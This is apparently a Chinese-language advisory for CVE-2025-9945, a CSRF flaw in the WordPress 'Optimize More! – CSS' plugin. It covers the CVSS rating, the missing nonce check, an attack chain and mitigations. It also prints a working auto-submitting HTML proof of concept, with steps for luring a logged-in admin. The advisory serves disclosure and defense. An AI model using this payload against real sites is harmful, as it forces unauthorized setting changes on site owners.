CVE-2025-9945：WordPress Optimize More! CSS插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-9945

漏洞类型

跨站请求伪造（CSRF）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Optimize More! – CSS 插件

漏洞概述

CVE-2025-9945是WordPress插件"Optimize More! – CSS"中存在的一个跨站请求伪造（Cross-Site Request Forgery, CSRF）漏洞。该插件是一款用于优化WordPress网站CSS加载性能的辅助工具，旨在帮助网站管理员通过合并、压缩等手段提升页面加载速度。该漏洞由WordPress安全团队[email protected]发现并报告，于2025年10月3日正式公开披露。

根据NVD（美国国家漏洞数据库）的评估，该漏洞的CVSS 3.1基础评分为4.3分，属于中等严重等级。其CVSS向量为CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N，表明该漏洞可通过网络远程利用，攻击复杂度低，无需任何权限认证，但需要受害者用户进行交互（如点击链接）。漏洞对机密性无影响，对完整性有低程度影响，对可用性无影响。

该漏洞的核心问题在于插件的`reset_plugin`函数中缺少或不正确的Nonce验证机制。在WordPress安全体系中，Nonce（Number used once）是一种防止CSRF攻击的关键安全机制，用于确保请求确实来自合法用户而非第三方伪造。由于该插件未正确实施Nonce验证，攻击者可以构造恶意的跨站请求，诱骗已登录的管理员点击特定链接，从而在管理员不知情的情况下重置插件的优化设置。虽然该漏洞本身不会导致数据泄露或远程代码执行等高危后果，但可能会破坏网站的性能优化配置，导致网站加载速度下降或样式异常。

技术细节

从技术层面分析，CVE-2025-9945是一个典型的WordPress插件CSRF漏洞。WordPress平台通过Nonce机制来防御CSRF攻击，Nonce是一个基于用户会话和时间戳生成的唯一令牌，服务器端会验证每个状态更改请求中的Nonce值是否有效。

该漏洞存在于`Settings.php`文件的第216行附近的`reset_plugin`函数中。具体而言，当插件处理重置优化设置的请求时，未对请求中的Nonce字段进行验证，或验证逻辑存在缺陷，使得攻击者可以绕过这一安全检查。

利用方式如下：
1. 攻击者首先分析目标WordPress网站是否安装了"Optimize More! – CSS"插件（版本≤1.0.3）；
2. 攻击者构造一个包含恶意请求的HTML页面，该页面通过表单自动提交或IMG标签等方式向目标网站的`reset_plugin`端点发送POST请求；
3. 攻击者通过社会工程学手段（如钓鱼邮件、即时消息等）诱骗已登录的管理员访问该恶意页面；
4. 当管理员在已登录状态下访问恶意页面时，浏览器会自动携带其会话Cookie发送请求；
5. 由于服务器端未验证Nonce，请求被成功处理，插件的优化设置被重置为默认值。

该漏洞的影响主要体现在：破坏了管理员对插件的配置，导致网站CSS优化功能失效；为后续攻击（如结合其他漏洞进行更深层次的入侵）提供了潜在的跳板。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者通过常规手段（如查看页面源代码、使用WPScan等工具）确认目标WordPress网站是否安装了"Optimize More! – CSS"插件，并核实版本号是否在受影响范围内（≤1.0.3）。

STEP 2

步骤2：构造恶意页面

攻击者构造一个包含CSRF攻击代码的HTML页面，该页面包含一个自动提交的表单，目标URL指向WordPress站点的`reset_plugin`处理端点，且不包含任何有效的Nonce令牌。

STEP 3

步骤3：社会工程诱导

攻击者通过钓鱼邮件、即时通讯工具、论坛帖子等方式，将恶意页面的链接发送给目标网站的管理员，诱骗其点击。

STEP 4

步骤4：触发CSRF请求

已登录的管理员在浏览器中打开恶意页面后，页面中的JavaScript自动触发表单提交，浏览器携带管理员的会话Cookie向目标站点发送伪造的POST请求。

STEP 5

步骤5：设置被重置

由于`reset_plugin`函数缺少Nonce验证，服务器端接受该请求并执行重置操作，插件的所有优化设置被恢复为默认值，攻击完成。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-9945 PoC - CSRF exploit for WordPress Optimize More! CSS plugin -->
<!-- This PoC demonstrates how to reset the plugin's optimization settings via CSRF -->

<html>
  <body>
    <h1>CSRF PoC for CVE-2025-9945</h1>
    <!-- The form auto-submits when the page loads, triggering the reset_plugin action -->
    <form action="http://target-wordpress-site.com/wp-admin/admin-post.php" method="POST" id="csrf-form">
      <!-- The 'action' parameter targets the reset_plugin function in the Optimize More! CSS plugin -->
      <input type="hidden" name="action" value="reset_plugin" />
      <!-- No nonce field is included, exploiting the missing nonce validation -->
      <input type="hidden" name="reset_confirm" value="yes" />
    </form>
    <script>
      // Auto-submit the form when the victim (logged-in admin) loads this page
      document.getElementById('csrf-form').submit();
    </script>
  </body>
</html>

<!--
Usage:
1. Host this HTML on an attacker-controlled server.
2. Trick a logged-in WordPress administrator into visiting this page.
3. The form will auto-submit, sending a forged request to reset the plugin settings.
4. The plugin's optimization settings will be reset to default without admin consent.

Note: The exact endpoint and parameter names may vary depending on the plugin version.
Refer to: https://plugins.trac.wordpress.org/browser/optimize-more-css/trunk/includes/classes/Settings.php#L216
-->

影响范围

WordPress Optimize More! – CSS 插件 <= 1.0.3

防御指南

临时缓解措施

在官方修复版本发布之前，建议网站管理员采取以下临时缓解措施：1）暂时停用"Optimize More! – CSS"插件，直至确认已安装修复版本；2）如果必须使用该插件，可通过修改插件源代码，在`reset_plugin`函数中添加`check_admin_referer()`或`wp_verify_nonce()`函数进行Nonce验证；3）部署Wordfence等安全防护插件，启用CSRF防护规则；4）管理员在浏览网页时应保持警惕，避免在已登录WordPress后台的状态下点击可疑链接；5）考虑为管理员账户启用双因素认证，以降低会话被劫持的风险。